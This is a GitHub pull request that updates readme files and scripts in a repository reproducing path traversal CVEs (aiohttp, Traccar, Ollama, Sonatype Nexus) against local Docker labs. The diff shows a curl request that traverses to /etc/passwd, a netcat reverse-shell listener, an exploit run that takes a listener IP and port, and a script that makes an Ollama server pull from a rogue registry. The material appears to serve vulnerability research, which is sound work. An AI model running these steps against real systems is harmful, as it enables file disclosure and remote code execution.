Skip to content

Path traversal #4

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open

Path traversal #4

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
02e61d0
Correction on readme.md steps
Shreeram-whiteHack Nov 7, 2024
d16c1a0
Documentation Update
Shreeram-whiteHack Nov 10, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions .gitignore
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,4 +2,9 @@
go1.21.1.linux-amd64.tar.gz
go.sum
go.mod
success.txt

path_traversal/CVE-2024-48914/package-lock.json
path_traversal/CVE-2023-1177/.env
path_traversal/CVE-2024-48914/package.json
.gitignore
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-23334/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,6 @@
- Execute : ``` python CVE-2024-23334.py ```

### Step 2:
- Target Server: ``` http://localhost/8081```
- Target Server: ``` http://localhost:8081```
- Once aiohttp server is up and running, check on port 8081 of localhost
- ``` curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd ```
Empty file modified path_traversal/CVE-2024-24809/exec.sh
100644 → 100755
View file
Open in desktop
Empty file.
30 changes: 27 additions & 3 deletions path_traversal/CVE-2024-24809/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -23,10 +23,34 @@ nc -lvnp 4444
```

### Step 3:
- Target server: ``` http://localhost/8089```

- ```sudo docker ps -a``` and find your container id. ```sudo dokcer inspect <containerID>```
- Getting the bash shel inside the container traccar application: ```sudo docker exec -it de754882c324 sh```
- Execute the following commands:
```
apk add dcron
apk add openrc
apk add nano
apk add inotify-tools
Update /etc/crontabs/root to have the 1minute job: nano /etc/crontabs/root
- inside the file add the following at the end:= * * * * * run-parts /etc/periodic/1minute
mkdir /etc/periodic/1minute
rc-service /usr/sbin/crond start
crontab -l

Copy contents from the exec.sh file


chmod +x exec.sh

Run this file in the below terminal:
/opt/traccar # ./exec.sh &
```
- Check your host port and add it in the ```target_url=``` inside the exec.sh, bash file
- Target server: ``` http://localhost:8089```

Execute exploit script

```
go run exploit.go http://localhost:80 LISTENER_IP LISTENER_PORT
```
go run exploit.go http://localhost:80 < LISTENER_IP > < LISTENER_PORT >
```
4 changes: 2 additions & 2 deletions path_traversal/CVE-2024-37032/exec.sh
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
#!/bin/bash

HOST="10.155.102.94"
HOST="192.168.1.40"
target_url="http://${HOST}:11434"

vuln_registry_url="${HOST}/rogue/poc"
Expand All @@ -9,4 +9,4 @@ pull_url="${target_url}/api/pull"
push_url="${target_url}/api/push"

curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${pull_url}"
curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
10 changes: 6 additions & 4 deletions path_traversal/CVE-2024-37032/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,10 +21,12 @@ Execute the following to install go
Execute: ``` docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33 ```
and set up the docker container

## Step 2:
- Target server: ```http://localhost/80```
## Step 2:
- ```hostname -I``` to find your IP. Add this inside target_server.py : ```HOST = ```

- Target server: ```http://localhost/```
- Rogue Server Setup:
Execute Target Server: ``` go run rogue_server.go ```
Execute Target Server: ``` python target_server.py ```

## Step 3:
Exploit Script Execution: ``` go run CVE-2024-23334.go ```
Exploit Script Execution: ``` ./exec.sh ```
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-37032/target_server.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
from fastapi import FastAPI, Request, Response

HOST = "10.155.102.94"
HOST = "192.168.1.40"
app = FastAPI()

@app.get("/")
Expand Down
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-48914/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -64,7 +64,7 @@ volumes:
driver: local
```
- Build the docker and run it:
```docker compose up --build```
```sudo docker-compose up```

### Step 3:
- Open a new terminal and run the following commands
Expand Down
4 changes: 3 additions & 1 deletion path_traversal/CVE-2024-4956/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
# CVE-2024-4956: Path Traversal Vulnerability in Sonatype Nexus Repository 3

## Article Source :
```
https://ethicalhacking.uk/cve-2024-4956-path-traversal-vulnerability-in-sonatype-nexus-repository-3/#gsc.tab=0
Expand All @@ -15,5 +17,5 @@ docker run -p 8081:8081 --name nexus sonatype/nexus3:3.68.0-java8
### Step 3:
Create ```exploit.sh bash``` file
### Step 4: Execute:
- Target Server: ``` http://localhost/8081 ```
- Target Server: ``` http://localhost:8081 ```
``` ./exploit.sh ```